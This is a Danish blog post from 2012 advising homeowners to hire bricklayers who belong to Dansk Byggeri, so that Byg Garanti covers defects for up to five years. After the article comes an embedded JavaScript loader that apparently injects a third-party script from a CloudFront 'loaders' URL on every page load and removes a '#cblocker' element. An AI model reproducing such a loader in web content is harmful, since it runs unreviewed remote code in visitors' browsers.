Smartlog v3 » Tips, Guides & Informationer » Hvorfor vælge kvalitetssikret murerarbejde?
Opret egen blog | Næste blog »

Tips, Guides & Informationer

Her på bloggen kan du læse gratis tips, guides og informationer om alt mellem himmel og jord

Hvorfor vælge kvalitetssikret murerarbejde?

27. Jul 2012 13:20, webmayn

Når den står på ombygning i lejligheden eller huset, kan det fra tid til anden være fristende at benytte sig af billige tilbud, hvilket somme tider også kan være helt korrekt udført. Og hvorfor skal man ikke kaste sig over det billigste, hvis det nu lige netop rækker til, hvad man har på kontoen? Det kan man også godt, men en anden, og meget væsentlig, faktor, udover prisen, er naturligvis kvaliteten.

 

Hvis man køber et par bukser eller en vase i en butik, ved man, at der er to års garanti, hvis man gemmer sin kvittering, men hvordan forholder det sig ved byggesager, som indeholder murerarbejde? Et byggeprojekt, som eksempelvis en etablering af en ny skillevæg i huset, kan for nogle virke uhåndgribelig, og man tænker muligvis mere på, hvordan den ser ud, når den lige er blevet lavet i stedet for at tænke langsigtet – hvordan kan man være sikker på, at muren stadig er intakt om nogle år?

 

Det kan man ikke. Der er mange ting, der spiller sammen ved byggeprojekter, men en ting man bør overveje nøje, er naturligvis valget af murer . Alle murere, og det arbejde de udfører, er ikke ens, og hvis man vil være sikret et stykke ud i fremtiden, er det vigtigt, at man vælger en murer, der er medlem af Dansk Byggeri. Ved et medlemskab hos Dansk Byggeri er man dækket af Byg Garanti, hvilket vil sige, at sker der noget uventet med ens udførte arbejde, dækker Byg Garanti op til fem år efter udførelsen af arbejdet.

Dette er med til at sikre din bolig for fatale håndværksmæssige fejl, og det vil ikke mindst spare dig for unødige omkostninger. 

if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};

Tags

Relaterede